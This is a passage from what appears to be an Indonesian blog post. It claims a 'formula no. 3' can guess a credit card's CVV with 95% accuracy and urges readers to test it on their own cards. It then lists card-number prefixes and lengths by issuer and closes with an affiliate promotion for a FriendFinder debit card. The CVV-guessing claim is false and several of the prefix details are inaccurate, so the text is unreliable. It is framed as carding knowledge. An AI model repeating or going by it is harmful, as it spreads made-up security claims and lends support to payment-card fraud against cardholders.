cocok tuh perhitungannya menggunakan Rumus yang ke 3 !!!
Tapi anda jangan kuatir, konon rumus ini ketepatannya hanya 95 % saja, jadi masih
ada kemungkinan 5 % yang meleset.
Jadi apabila anda mencobanya dengan Kartu
Kredit Anda, dan setelah anda
menghitung dan HASILNYA SALAH, maka Beruntunglah Anda !!!
Saya malah jadi was-was dan deg-degan , karena CVV KARTU KREDIT saya
TERNYATA DAPAT DITEBAK dengan menggunakan Rumus No. 3 !!!
Wah, saya jadi harus lebih berhati-hati nich apabila ingin Berbelanja Online, bisa-bisa
Kartu Kredit Saya nanti dijebol maling…. Wah, mudah-mudahan hal itu jangan
sampai terjadi deh … Amin. Cara Rahasia Mengetahui apakah suatu
Kartu Kredit diterbitkan oleh Visa/
Mastercard/ Amex/ Discover Untuk Tambahan Pengetahuan Anda, maka berikut saya jelaskan mengenai nomer sandi dari masing-masing perusahaan Kartu Kredit. UNTUK MASTERCARD : Angka Awal pada Kartu Kredit adalah 51, 52, 53, 54, 55, 56, dll dengan panjang Nomer Kartu Kredit Antara 14 hingga 16 Digit. UNTUK VISA : Angka Awal pada Kartu Kredit adalah “4”
dengan panjang Nomer Kartu Kredit adalah
13 hingga 16 Digit. UNTUK AMERICAN EXPRESS : Angka Awal pada Kartu Kredit adalah “34”
dengan panjang Nomer Kartu Kredit adalah
15 Digit. UNTUK DINERS CLUB : Angka Awal pada Kartu Kredit adalah
300,301,302,303,304,305, dan 38 dengan
panjang Nomer Kartu Kredit adalah 14 Digit UNTUK JCB : Angka Awal pada Kartu Kredit adalah “3”
dengan panjang Nomer Kartu Kredit adalah
16 Digit UNTUK BANKCARD : Angka Awal pada Kartu Kredit adalah “56”
dengan panjang Nomer Kartu Kredit adalah
14 Atau 16 Digit UNTUK DISCOVER CARD : Angka Awal pada Kartu Kredit adalah 6011,
6500 – 6509, 6013 dengan panjang Nomer
Kartu Kredit adalah 16 Digit. Jika anda ingin mempraktekan atau penasaran ingin mencobanya dengan menggunakan kartu kredit yang asli. Sebuah Perusahaan Afliate yaitu FriendFinder mamberi kemudahan bagi para membernya dengan cara memberi DebetCard untuk memudahkan pencairan uang dari hasil merekrut member untuk daftar di FriendFinder. Baca Tutorialnya DISINI.. Kartunya dari perusahaan MasterCard yang bentuknya DebetCard.
Subscribe to:
Posts (Atom)